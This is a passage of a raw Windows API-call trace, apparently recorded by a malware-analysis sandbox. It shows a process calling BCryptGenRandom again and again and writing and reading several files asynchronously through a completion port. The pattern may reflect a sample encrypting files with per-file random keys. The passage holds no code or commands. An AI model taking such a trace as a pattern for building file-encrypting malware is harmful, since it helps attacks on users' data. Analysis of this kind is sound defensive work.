lpOverlapped=0x336fc18) returned 1 [0149.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.304] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.304] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.304] free (_Block=0x3e305b8) [0149.304] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.304] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.305] free (_Block=0x1fa91d0) [0149.305] free (_Block=0x1fa2ed8) [0149.305] free (_Block=0x1fa90b8) [0149.305] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.322] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.322] free (_Block=0x3e305b8) [0149.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.322] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.322] free (_Block=0x1fa91d0) [0149.322] free (_Block=0x1fa2ed8) [0149.322] free (_Block=0x1fa90b8) [0149.322] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0149.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.327] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.327] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.328] free (_Block=0x3e305b8) [0149.328] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.328] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.328] free (_Block=0x1fa91d0) [0149.328] free (_Block=0x1fa2ed8) [0149.328] free (_Block=0x1fa90b8) [0149.328] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0149.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.338] CloseHandle (hObject=0x3cc) returned 1 [0149.339] free (_Block=0x3df0008) [0149.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.339] CloseHandle (hObject=0xec) returned 1 [0149.340] free (_Block=0x1ff1e60) [0149.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.340] CloseHandle (hObject=0x308) returned 1 [0149.340] free (_Block=0x3d70450) [0149.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.431] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.432] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.432] free (_Block=0x3e305b8) [0149.432] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.432] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.432] free (_Block=0x1fa91d0) [0149.432] free (_Block=0x1fa2ed8) [0149.432] free (_Block=0x1fa90b8) [0149.432] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0149.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.433] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0149.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.620] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.628] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd90, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.628] CloseHandle (hObject=0x308) returned 1 [0149.628] free (_Block=0x1ff1e60) [0149.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.637] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.637] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.637] free (_Block=0x3e305b8) [0149.637] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.637] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.637] free (_Block=0x1fa91d0) [0149.637] free (_Block=0x1fa2ed8) [0149.637] free (_Block=0x1fa90b8) [0149.637] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0149.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.944] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.949] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.954] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.955] free (_Block=0x3e305b8) [0149.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.957] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.958] free (_Block=0x1fa91d0) [0149.958] free (_Block=0x1fa2ed8) [0149.958] free (_Block=0x1fa90b8) [0149.958] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0149.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0149.977] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.977] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.977] free (_Block=0x3e305b8) [0149.977] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.977] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.978] free (_Block=0x1fa91d0) [0149.978] free (_Block=0x1fa2ed8) [0149.978] free (_Block=0x1fa90b8) [0149.978] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.002] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x29e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.014] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x3010, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.022] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.025] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.032] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.035] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x73a2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.037] CloseHandle (hObject=0x308) returned 1 [0150.037] free (_Block=0x3df0008) [0150.038] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.073] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.073] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.073] free (_Block=0x3e305b8) [0150.073] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.073] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.073] free (_Block=0x1fa91d0) [0150.073] free (_Block=0x1fa2ed8) [0150.074] free (_Block=0x1fa90b8) [0150.074] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.085] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.085] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.085] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.086] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.086] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.086] free (_Block=0x3e305b8) [0150.086] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.087] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.087] free (_Block=0x1fa91d0) [0150.087] free (_Block=0x1fa2ed8) [0150.087] free (_Block=0x1fa90b8) [0150.087] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.104] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.104] free (_Block=0x3e305b8) [0150.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.104] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.105] free (_Block=0x1fa91d0) [0150.105] free (_Block=0x1fa2ed8) [0150.105] free (_Block=0x1fa90b8) [0150.105] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.113] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.114] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.115] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.115] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.115] free (_Block=0x3e305b8) [0150.115] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.115] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.116] free (_Block=0x1fa91d0) [0150.116] free (_Block=0x1fa2ed8) [0150.116] free (_Block=0x1fa90b8) [0150.116] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.131] CloseHandle (hObject=0x170) returned 1 [0150.132] free (_Block=0x1ff1e60) [0150.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.146] CloseHandle (hObject=0xec) returned 1 [0150.146] free (_Block=0x3d70450) [0150.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.158] CloseHandle (hObject=0x3cc) returned 1 [0150.158] free (_Block=0x3e70008) [0150.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.183] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7300, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.185] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.186] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x48c0, 